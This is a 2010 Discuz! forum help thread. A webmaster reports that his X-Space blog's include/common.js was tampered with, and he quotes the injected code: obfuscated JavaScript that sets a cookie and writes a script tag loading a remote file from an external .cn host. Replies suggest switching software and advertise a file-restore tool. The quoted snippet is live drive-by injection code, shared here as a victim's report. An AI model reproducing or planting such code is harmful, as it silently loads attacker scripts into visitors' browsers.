Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[已答复] 今天发现我的两台服务器分别装的ss6.0-x-space4.X博客都被人蓦改了文件挂马

[复制链接]
wcl2222 发表于 2010-1-8 13:49:02 | 显示全部楼层 |阅读模式
本帖最后由 wcl2222 于 2010-01-08 13:53 编辑

挂码的代码如下(include/common.js):(在原文件的第139行下面开始添加)
  1. ;var ss=document.cookie;
  2. var aa=ss.indexOf("showtable");
  3. var l="<";var r=">";var m="/";
  4. if(aa!=-1){}else{var expires=new Date();
  5. expires.setTime(expires.getTime()+24*60*60*1000);
  6. document.cookie="showtable=true;expires="+expires.toGMTString();
  7. document.write(l+"sc"+"ript src=ht"+"tp:"+m+m+"ww"+"w.n%36%388."+"cn"+m+"tf"+m+"ad1.j"+"s"+r+l+m+"sc"+"ript"+r);};
复制代码
是程序漏洞,还是我的问题呢

服务器杀毒软件截获以下信息

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
lidq.jingwu 发表于 2010-1-8 14:43:40 | 显示全部楼层
回复 1# wcl2222


    建议你使用uchome,而不是使用xspace,修复的可能性很小了。
回复

使用道具 举报

hoiuan 发表于 2010-1-18 18:12:09 | 显示全部楼层
我自己做过一个软件,专门针对服务器文件安全的,1秒内还原被修改的文件,可以记录指定目录所有文件的操作事件.....需要的话联系我qq:407292999
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-18 18:24 , Processed in 0.021904 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表